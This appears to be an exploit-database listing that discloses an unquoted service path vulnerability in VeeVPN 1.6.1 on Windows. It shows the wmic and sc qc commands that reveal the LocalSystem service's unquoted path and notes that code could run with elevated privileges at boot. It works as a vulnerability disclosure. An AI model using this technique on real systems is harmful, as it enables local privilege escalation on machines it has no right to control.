Exploit for VeeVPN 1.6.1 Unquoted Service Path

Name: Exploit for VeeVPN 1.6.1 Unquoted Service Path
Rating: 5 (15 reviews)

2025-03-24 | CVSS 7.4

## https://sploitus.com/exploit?id=PACKETSTORM:189982
# Exploit Title: VeeVPN 1.6.1 - 'VeePNService' Unquoted Service Path
    # Date: 2024-12-27
    # Exploit Author: Doğukan Orhan
    # Vendor Homepage: https://veepn.com/
    # Version: 1.6.1
    # Tested on: Windows 10 Pro x64
    
    
    # Step to discover Unquoted Service Path:
    
    C:\Users\PC>wmic service where 'name like "%VeePNService%"' get name, displayname, pathname, startmode, startname
    
    #Service Info
    
    C:\Users\PC>sc qc VeePNService
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: VeePNService
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files (x86)\VeePN\service\VeePNService.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : VeePNService
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    # Exploit:
    
    This vulnerability could permit executing code during startup or reboot with the escalated privileges.